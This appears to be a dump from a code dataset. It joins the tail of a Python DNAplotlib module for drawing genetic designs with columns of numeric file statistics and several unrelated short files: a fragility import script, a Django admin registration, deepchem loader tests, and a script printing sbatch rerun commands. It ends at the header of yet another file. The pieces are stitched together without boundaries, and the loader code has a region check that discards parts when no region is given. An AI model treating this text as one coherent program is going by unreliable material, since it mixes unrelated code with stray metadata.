self.backbone_pad_left = backbone_pad_left
self.backbone_pad_right = backbone_pad_right
self.reg_height = 15
def SBOL_part_renderers (self):
""" Return dictionary of all standard built-in SBOL part renderers.
"""
return {
'Promoter' :sbol_promoter,
'CDS' :sbol_cds,
'Terminator' :sbol_terminator,
'RBS' :sbol_rbs,
'Scar' :sbol_scar,
'Spacer' :sbol_spacer,
'EmptySpace' :sbol_empty_space,
'Ribozyme' :sbol_ribozyme,
'Ribonuclease' :sbol_stem_top,
'Protease' :sbol_stem_top,
'DNACleavageSite' :sbol_stem_top,
'RNACleavageSite' :sbol_stem_top,
'ProteinCleavageSite':sbol_stem_top,
'DNALocation' :sbol_stem_top,
'RNALocation' :sbol_stem_top,
'ProteinLocation' :sbol_stem_top,
'DNAStability' :sbol_stem_top,
'RNAStability' :sbol_stem_top,
'ProteinStability' :sbol_stem_top,
'StemTop' :sbol_stem_top,
'Operator' :sbol_operator,
'Origin' :sbol_origin,
'Insulator' :sbol_insulator,
'5Overhang' :sbol_5_overhang,
'3Overhang' :sbol_3_overhang,
'RestrictionSite' :sbol_restriction_site,
'BluntRestrictionSite' :sbol_blunt_restriction_site,
'PrimerBindingSite' :sbol_primer_binding_site,
'5StickyRestrictionSite' :sbol_5_sticky_restriction_site,
'3StickyRestrictionSite' :sbol_3_sticky_restriction_site,
'UserDefined' :sbol_user_defined,
'Signature' :sbol_signature}
def trace_part_renderers (self):
""" Return dictionary of all standard built-in trace part renderers.
"""
return {
'Promoter' :trace_promoter,
'CDS' :trace_cds,
'Terminator' :trace_terminator,
'RBS' :trace_rbs,
'UserDefined' :trace_user_defined}
def std_reg_renderers (self):
""" Return dictionary of all standard built-in regulation renderers.
"""
return {
'Repression' :repress,
'Activation' :induce,
'Connection' :connect}
def renderDNA (self, ax, parts, part_renderers, regs=None, reg_renderers=None, plot_backbone=True):
""" Render the parts on the DNA and regulation.
Parameters
----------
ax : matplotlib.axes
Axes to draw the design to.
parts : list(dict)
The design to draw. This is a list of dicts, where each dict relates to
a part and must contain the following keys:
- name (string)
- type (string)
- fwd (bool)
- start (float, optional)
- end (float, optional)
These will then be drawn in accordance with the renders selected
part_renderers : dict(functions)
Dict of functions where the key in the part type and the dictionary returns
the function to be used to draw that part type.
regs : list(dict) (default=None)
Regulation present in the design. This is a list of dicts, where each dict
relates to a single regulation arc and must contain the following keys:
- type (string)
- from_part (part object dict)
- to_part (part object dict)
These will then be drawn in accordance with the renders selected.
reg_renderers : dict(functions) (default=None)
Dict of functions where the key in the regulation type and the dictionary
returns the function to be used to draw that regulation type.
Returns
-------
start : float
The x-point in the axis space that drawing begins.
end : float
The x-point in the axis space that drawing ends.
"""
# Update the matplotlib rendering default for drawing the parts (we want mitered edges)
matplotlib.rcParams['lines.dash_joinstyle'] = 'miter'
matplotlib.rcParams['lines.dash_capstyle'] = 'butt'
matplotlib.rcParams['lines.solid_joinstyle'] = 'miter'
matplotlib.rcParams['lines.solid_capstyle'] = 'projecting'
# Make text editable in Adobe Illustrator
matplotlib.rcParams['pdf.fonttype'] = 42
# Plot the parts to the axis
part_num = 0
prev_end = 0
first_start = 0
first_part = True
for part in parts:
keys = list(part.keys())
# Check the part has minimal details required
if 'type' in keys:
if 'fwd' not in keys:
part['fwd'] = True
elif part['fwd'] == False and 'start' in keys and 'end' in keys:
start = part['start']
end = part['end']
part['end'] = start
part['start'] = end
if 'start' not in keys:
if part['fwd'] == True:
part['start'] = part_num
else:
part['start'] = part_num+1
if 'end' not in keys:
if part['fwd'] == True:
part['end'] = part_num+1
else:
part['end'] = part_num
# Extract custom part options (if available)
part_opts = None
if 'opts' in list(part.keys()):
part_opts = part['opts']
# Use the correct renderer
if 'renderer' in list(part.keys()):
# Use custom renderer
prev_start, prev_end = part['renderer'](ax, part['type'], part_num,
part['start'], part['end'], prev_end,
self.scale, self.linewidth,
opts=part_opts)
#update start,end for regulation
#part['start'] = prev_start
#part['end'] = prev_end
if first_part == True:
first_start = prev_start
first_part = False
else:
# Use standard renderer, if one exists
if part['type'] in list(part_renderers.keys()):
prev_start, prev_end = part_renderers[part['type']](ax,
part['type'], part_num,
part['start'], part['end'],
prev_end, self.scale,
self.linewidth, opts=part_opts)
#update start,end for regulation [TEG]
if part['fwd'] == True:
part['start'] = prev_start
part['end'] = prev_end
else:
part['start'] = prev_end
part['end'] = prev_start
if first_part == True:
first_start = prev_start
first_part = False
part_num += 1
# first pass to get all of the arcranges
if regs != None:
for reg in regs:
keys = list(reg.keys())
# Check the part has minimal details required
if 'type' in keys and 'from_part' in keys and 'to_part' in keys:
# Extract custom part options (if available)
reg_opts = None
if 'opts' in list(reg.keys()):
reg_opts = reg['opts']
if reg['type'] in list(reg_renderers.keys()):
##############################################################################
arcstart = (reg['from_part']['start'] + reg['from_part']['end']) / 2
arcend = (reg['to_part']['start'] + reg['to_part']['end']) / 2
arcrange = [arcstart,arcend]
reg['arclength'] = math.fabs(arcstart-arcend)
reg['arc_height_index'] = 1
##############################################################################
#sort regs by arc ranges from shortest to longest
regs.sort(key=lambda x: x['arclength'], reverse=False)
reg_num = 0
pos_arc_ranges = [] # arc above DNA backbone if to_part is fwd
neg_arc_ranges = [] # arc below DNA backbone if to_part is reverse
current_max = 1
# second pass to render all the arcs
for reg in regs:
keys = list(reg.keys())
# Check the part has minimal details required
if 'type' in keys and 'from_part' in keys and 'to_part' in keys:
# Extract custom part options (if available)
reg_opts = None
if 'opts' in list(reg.keys()):
reg_opts = reg['opts']
if reg['type'] in list(reg_renderers.keys()):
##############################################################################
# arc height algorithm: greedy from left-to-right on DNA design
arcstart = (reg['from_part']['start'] + reg['from_part']['end']) / 2
arcend = (reg['to_part']['start'] + reg['to_part']['end']) / 2
arcmin = min(arcstart,arcend)
arcmax = max(arcstart,arcend)
arcrange = [arcmin,arcmax,reg['arc_height_index']]
arc_height_index = 1
# arc above if to_part is fwd
if(reg['to_part']['fwd'] == True):
# find max arc height index of ONLY the prior arcs that clash with the current arc
current_max = 1
for r in pos_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
# if arcs cross over, increment the arc height index
for r in pos_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
pos_arc_ranges.append(arcrange)
# arc below if to_part is reverse
else:
# find max arc height index
current_max = 1
for r in neg_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
# if arcs cross over, increment the arc height index
for r in neg_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
neg_arc_ranges.append(arcrange)
##############################################################################
reg_renderers[reg['type']](ax, reg['type'],
reg_num, reg['from_part'],
reg['to_part'], self.scale,
self.linewidth, reg['arc_height_index'], opts=reg_opts)
reg_num += 1
# Plot the backbone (z=1)
if plot_backbone == True:
l1 = Line2D([first_start-self.backbone_pad_left,prev_end+self.backbone_pad_right],[0,0],
linewidth=self.linewidth, color=self.linecolor, zorder=10)
ax.add_line(l1)
return first_start, prev_end
def annotate (self, ax, part_renderers, part, annotate_zorder=1000):
""" Annotate a plot at a user specified location and offset.
"""
# Annotations show be placed on top of existing design
if 'opts' not in list(part.keys()):
part['opts'] = {'zorder_add': annotate_zorder}
else:
part['opts']['zorder_add'] = annotate_zorder
# Draw the part
part_renderers[part['type']](ax,
part['type'], 1,
part['start'], part['end'],
part['start'], self.scale,
self.linewidth, opts=part['opts'])
###############################################################################
# Helper functions to simplify plotting
###############################################################################
def plot_sbol_designs (axes, dna_designs, regulations=None, plot_params={}, plot_names=None):
""" Plot SBOL designs to axes.
Parameters
----------
axes : list(matplotlib.axis)
List of axis objects to plot the designs to.
dna_designs : list(dict(design_information))
List of designs to plot.
regulations : list(dict(regulation_information)) (default=None)
List of regulations to use for each design.
plot_params : dict (default={})
General plotting parameters to use.
plot_names : list(string) (default=None)
List of names to use on each plot. If None provided then no titles displayed.
Returns
-------
xlims : [float, float]
The x-axis range for each axis.
ylims : [float, float]
The y-axis range for each axis.
"""
# Standard plotting parameters
if 'axis_y' not in list(plot_params.keys()):
plot_params['axis_y'] = 35
left_pad = 0.0
right_pad = 0.0
scale = 1.0
linewidth = 1.0
fig_y = 5.0
fig_x = 5.0
if 'backbone_pad_left' in list(plot_params.keys()):
left_pad = plot_params['backbone_pad_left']
if 'backbone_pad_right' in list(plot_params.keys()):
right_pad = plot_params['backbone_pad_right']
if 'scale' in list(plot_params.keys()):
scale = plot_params['scale']
if 'linewidth' in list(plot_params.keys()):
linewidth = plot_params['linewidth']
dr = DNARenderer(scale=scale, linewidth=linewidth,
backbone_pad_left=left_pad,
backbone_pad_right=right_pad)
# We default to the standard regulation renderers
reg_renderers = dr.std_reg_renderers()
# We default to the SBOL part renderers
part_renderers = dr.SBOL_part_renderers()
# Plot each design on the appropriate axis
num_of_designs = len(dna_designs)
max_dna_len = 0.0
for i in range(num_of_designs):
# Create axis for the design and plot
regs = None
if(regulations != None):
regs = regulations[i]
design = dna_designs[i]
ax = axes[i]
if plot_names != None:
ax.set_title(plot_names[i], fontsize=8)
start, end = dr.renderDNA(ax, design, part_renderers, regs, reg_renderers)
dna_len = end-start
if max_dna_len < dna_len:
max_dna_len = dna_len
# Update formatting and resize all axis in similar way
for ax in axes:
ax.set_xticks([])
ax.set_yticks([])
# Set bounds
ax.set_xlim([(-0.01*max_dna_len)-left_pad,
max_dna_len+(0.01*max_dna_len)+right_pad])
ax.set_ylim([-plot_params['axis_y'],plot_params['axis_y']])
ax.set_aspect('equal')
ax.set_axis_off()
# xlims, ylims are returned
return max_dna_len, [(-0.01*max_dna_len)-left_pad, max_dna_len+(0.01*max_dna_len)+right_pad], [-plot_params['axis_y'],plot_params['axis_y']]
def save_sbol_designs (filename, dna_designs, regulations=None, plot_params={}, plot_names=None):
""" Plot SBOL designs to axes.
Parameters
----------
filename : string
Image filename to save designs to. Extention provided will determine format
and must be supported by matplotlib.
dna_designs : list(dict(design_information))
List of designs to plot.
regulations : list(dict(regulation_information)) (default=None)
List of regulations to use for each design.
plot_params : dict (default={})
General plotting parameters to use.
plot_names : list(string) (default=None)
List of names to use on each plot. If None provided then no titles displayed.
"""
# Create the figure
fig = plt.figure(figsize=(10,10))
fig.patch.set_facecolor('white')
# Create all the axes required
axes = []
for i in range(len(dna_designs)):
ax = fig.add_subplot(len(dna_designs),1,i+1, axisbg='white')
axes.append(ax)
# Plot design to the axes
max_dna_len, lims, params = plot_sbol_designs (axes, dna_designs, regulations=regulations, plot_params=plot_params, plot_names=plot_names)
# Update the size of the figure to fit the constructs drawn
fig_x_dim = max_dna_len/70.0
if fig_x_dim < 1.0:
fig_x_dim = 1.0
fig_y_dim = 1.2*len(axes)
plt.gcf().set_size_inches( (fig_x_dim, fig_y_dim) )
# Save the figure
plt.tight_layout()
fig.savefig(filename, transparent=True, dpi=300)
# Clear the plotting cache
plt.close('all')
###############################################################################
# Functions for reading designs from standard file formats
###############################################################################
def convert_attrib (attrib):
if attrib[0] == '(' and attrib[-1] == ')' and len(attrib.split(',')) == 3:
col_parts = attrib[1:-1].split(',')
new_col = (float(col_parts[0]), float(col_parts[1]), float(col_parts[2]))
return new_col
if attrib[0] == '(' and attrib[-1] == ')' and len(attrib.split(',')) == 4:
col_parts = attrib[1:-1].split(',')
new_col = (float(col_parts[0]), float(col_parts[1]), float(col_parts[2]), float(col_parts[3]))
return new_col
try:
# See if a number
return float(attrib)
except ValueError:
# Must be a string
return attrib
dpl_default_type_map = {'gene': 'CDS',
'promoter': 'Promoter',
'terminator': 'Terminator',
'rbs': 'RBS'}
def load_design_from_gff (filename, chrom, type_map=dpl_default_type_map, region=None):
# Load the GFF data
gff = []
data_reader = csv.reader(open(filename, 'rU'), delimiter='\t')
for row in data_reader:
if len(row) == 9:
cur_chrom = row[0]
part_type = row[2]
start_bp = int(row[3])
end_bp = int(row[4])
part_dir = row[6]
part_attribs = {}
split_attribs = row[8].split(';')
part_name = None
for attrib in split_attribs:
key_value = attrib.split('=')
if len(key_value) == 2:
if key_value[0] == 'Name':
part_name = key_value[1]
else:
part_attribs[key_value[0]] = convert_attrib(key_value[1])
if part_name != None and cur_chrom == chrom and part_type in list(type_map.keys()):
# Check feature start falls in region
if region != None and (start_bp > region[0] and start_bp < region[1]):
gff.append([part_name, type_map[part_type], part_dir, start_bp, end_bp, part_attribs])
# Convert to DNAplotlib design (sort on start position first)
design = []
for gff_el in sorted(gff, key=itemgetter(3)):
new_part = {}
new_part['name'] = gff_el[0]
new_part['type'] = gff_el[1]
if gff_el[2] == '+':
new_part['fwd'] = True
else:
new_part['fwd'] = False
new_part['start'] = gff_el[3]
new_part['end'] = gff_el[4]
new_part['opts'] = gff_el[5]
design.append(new_part)
# Return the sorted design
return design
def load_profile_from_bed (filename, chrom, region):
region_len = region[1]-region[0]
profile = [0]*region_len
data_reader = csv.reader(open(filename, 'rU'), delimiter='\t')
for row in data_reader:
if len(row) == 5:
cur_chrom = row[0]
cur_start_bp = int(row[1])
cur_end_bp = int(row[2])
if cur_start_bp == region[0] and cur_end_bp == region[1]:
profile[int(row[3])-1] = float(row[4])
return profile
| 41.442154
| 180
| 0.555921
| 15,952
| 124,658
| 4.130955
| 0.041249
| 0.034311
| 0.045526
| 0.063736
| 0.814362
| 0.795863
| 0.784072
| 0.775255
| 0.768942
| 0.762523
| 0
| 0.022799
| 0.316338
| 124,658
| 3,007
| 181
| 41.455936
| 0.750422
| 0.1095
| 0
| 0.704516
| 0
| 0
| 0.069702
| 0.001002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019355
| false
| 0
| 0.004301
| 0
| 0.052903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2106084a4b3c49c736096e104370e9d411dc4f38
| 153
|
py
|
Python
|
Code/RunFragility.py
|
ChimieleCode/OpenSees_Script
|
58dcd187e5eda1bf92f8f2c4fc83b74d9108372d
|
[
"MIT"
] | null | null | null |
Code/RunFragility.py
|
ChimieleCode/OpenSees_Script
|
58dcd187e5eda1bf92f8f2c4fc83b74d9108372d
|
[
"MIT"
] | null | null | null |
Code/RunFragility.py
|
ChimieleCode/OpenSees_Script
|
58dcd187e5eda1bf92f8f2c4fc83b74d9108372d
|
[
"MIT"
] | null | null | null |
from ModelOptions import compute_local_fragility
import Fragility.GlobalRegression
if compute_local_fragility:
import Fragility.LocalCurve
| 19.125
| 49
| 0.823529
| 16
| 153
| 7.625
| 0.5625
| 0.196721
| 0.344262
| 0.442623
| 0.590164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 153
| 7
| 50
| 21.857143
| 0.945736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
210d05fd890b8d29f9e5c24f4503e0c3c308558b
| 201
|
py
|
Python
|
pengujian/admin.py
|
userbaruu/aerotron
|
f2f2fb7797a75a7a3b3c0eb3836193bc05650c65
|
[
"MIT"
] | null | null | null |
pengujian/admin.py
|
userbaruu/aerotron
|
f2f2fb7797a75a7a3b3c0eb3836193bc05650c65
|
[
"MIT"
] | null | null | null |
pengujian/admin.py
|
userbaruu/aerotron
|
f2f2fb7797a75a7a3b3c0eb3836193bc05650c65
|
[
"MIT"
] | 1
|
2021-07-28T23:19:27.000Z
|
2021-07-28T23:19:27.000Z
|
from django.contrib import admin
from pengujian.models.paket import PaketPengujian
from pengujian.models.pengujian import Pengujian
admin.site.register(Pengujian)
admin.site.register(PaketPengujian)
| 25.125
| 49
| 0.855721
| 25
| 201
| 6.88
| 0.44
| 0.151163
| 0.22093
| 0.302326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079602
| 201
| 7
| 50
| 28.714286
| 0.92973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dcc63c5f04082066265bbd3767fa7dc9385e4b59
| 43
|
py
|
Python
|
app/user/tests/__init__.py
|
karserasl/recipe-app-api
|
0b107210fc3d079d5e644855d8cc4fb7b3e392c0
|
[
"MIT"
] | null | null | null |
app/user/tests/__init__.py
|
karserasl/recipe-app-api
|
0b107210fc3d079d5e644855d8cc4fb7b3e392c0
|
[
"MIT"
] | null | null | null |
app/user/tests/__init__.py
|
karserasl/recipe-app-api
|
0b107210fc3d079d5e644855d8cc4fb7b3e392c0
|
[
"MIT"
] | null | null | null |
# @Author: Lam
# @Date: 29/05/2020 20:57
| 14.333333
| 27
| 0.581395
| 8
| 43
| 3.125
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.352941
| 0.209302
| 43
| 2
| 28
| 21.5
| 0.382353
| 0.883721
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcc6a5d8042c5daa3ac5488806bdda3196e62757
| 5,453
|
py
|
Python
|
deepchem/data/tests/test_data_loader.py
|
hssinejihene/deepchem
|
7b5177240eb85a68819b4450635ec9df54afed23
|
[
"MIT"
] | null | null | null |
deepchem/data/tests/test_data_loader.py
|
hssinejihene/deepchem
|
7b5177240eb85a68819b4450635ec9df54afed23
|
[
"MIT"
] | null | null | null |
deepchem/data/tests/test_data_loader.py
|
hssinejihene/deepchem
|
7b5177240eb85a68819b4450635ec9df54afed23
|
[
"MIT"
] | null | null | null |
"""
Tests for FeaturizedSamples class
"""
import os
import unittest
import tempfile
import shutil
import deepchem as dc
def test_unlabelled():
current_dir = os.path.dirname(os.path.abspath(__file__))
input_file = os.path.join(current_dir, "../../data/tests/no_labels.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=[], feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
assert len(dataset.X)
def test_scaffold_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
splittype = "scaffold"
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_scaffold_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
splittype = "scaffold"
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_random_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_random_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
#splittype = "random"
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_log_solubility_dataset():
"""Test of loading for simple log-solubility dataset."""
current_dir = os.path.dirname(os.path.realpath(__file__))
input_file = "../../models/tests/example.csv"
input_file = os.path.join(current_dir, input_file)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks,
feature_field="smiles",
featurizer=dc.feat.CircularFingerprint(size=1024))
dataset = loader.create_dataset(input_file)
assert len(dataset) == 10
def test_dataset_move():
"""Test that dataset can be moved and reloaded."""
current_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = tempfile.mkdtemp()
data_dir = os.path.join(base_dir, "data")
moved_data_dir = os.path.join(base_dir, "moved_data")
dataset_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
featurized_dataset = loader.create_dataset(dataset_file, data_dir)
n_dataset = len(featurized_dataset)
# Now perform move
shutil.move(data_dir, moved_data_dir)
moved_featurized_dataset = dc.data.DiskDataset(moved_data_dir)
assert len(moved_featurized_dataset) == n_dataset
| 33.660494
| 79
| 0.738493
| 723
| 5,453
| 5.316736
| 0.131397
| 0.040583
| 0.031217
| 0.03642
| 0.854579
| 0.845473
| 0.836889
| 0.810614
| 0.810614
| 0.772893
| 0
| 0.008514
| 0.138456
| 5,453
| 161
| 80
| 33.869565
| 0.809706
| 0.092976
| 0
| 0.736842
| 0
| 0
| 0.088313
| 0.042831
| 0
| 0
| 0
| 0
| 0.114035
| 1
| 0.061404
| false
| 0
| 0.04386
| 0
| 0.105263
| 0.061404
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcd4616bb875b4ddf4a42cea16de07997a0d3e01
| 2,068
|
py
|
Python
|
project/experiments/exp_800_mile_stone/src/old/tmp_np.py
|
liusida/thesis-bodies
|
dceb8a36efd2cefc611f6749a52b56b9d3572f7a
|
[
"MIT"
] | null | null | null |
project/experiments/exp_800_mile_stone/src/old/tmp_np.py
|
liusida/thesis-bodies
|
dceb8a36efd2cefc611f6749a52b56b9d3572f7a
|
[
"MIT"
] | null | null | null |
project/experiments/exp_800_mile_stone/src/old/tmp_np.py
|
liusida/thesis-bodies
|
dceb8a36efd2cefc611f6749a52b56b9d3572f7a
|
[
"MIT"
] | null | null | null |
# import numpy as np
# a = np.array([17,22,4,2,14,24,0,5,8,7,27,28,15,25,12,9,20,3,29,16,10,6,1,13,18,23,11,26,21,19])
# np.random.shuffle(a)
# print(a.tolist())
# np.random.shuffle(a)
# print(a.tolist())
# np.random.shuffle(a)
# print(a.tolist())
need_rerun = [
{'bodies': [300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315],
'seed': 4, 'method': 'align'},
{'bodies': [300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315],
'seed': 6, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 0, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 4, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 6, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 0, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 3, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 5, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 6, 'method': 'random'},
{'bodies': [600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615],
'seed': 4, 'method': 'align'},
{'bodies': [600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615],
'seed': 6, 'method': 'align'}]
print("\n"*2)
for r in need_rerun:
cmd = f"sbatch -J exp_010_rerun submit.sh python 1.train.py --seed={r['seed']} --train_bodies={','.join([str(x) for x in r['bodies']])} --test_bodies={','.join([str(x) for x in r['bodies']])}"
if r["method"]=='random':
cmd += " --random_align_obs"
print(cmd)
print("\n"*2)
| 47
| 196
| 0.548356
| 348
| 2,068
| 3.235632
| 0.33046
| 0.05595
| 0.0746
| 0.09325
| 0.798401
| 0.769982
| 0.769982
| 0.769982
| 0.769982
| 0.722025
| 0
| 0.359952
| 0.200677
| 2,068
| 43
| 197
| 48.093023
| 0.321234
| 0.111702
| 0
| 0.6
| 0
| 0.033333
| 0.248359
| 0.034464
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4c0a7d92bc717af01a0a886144d8eb72f991bcb
| 1,600
|
py
|
Python
|
module_5/rotated_array.py
|
Sukhrobjon/career-lab
|
67bc38c0eb3b47248157f618cb34ed2bdd44fc78
|
[
"MIT"
] | null | null | null |
module_5/rotated_array.py
|
Sukhrobjon/career-lab
|
67bc38c0eb3b47248157f618cb34ed2bdd44fc78
|
[
"MIT"
] | null | null | null |
module_5/rotated_array.py
|
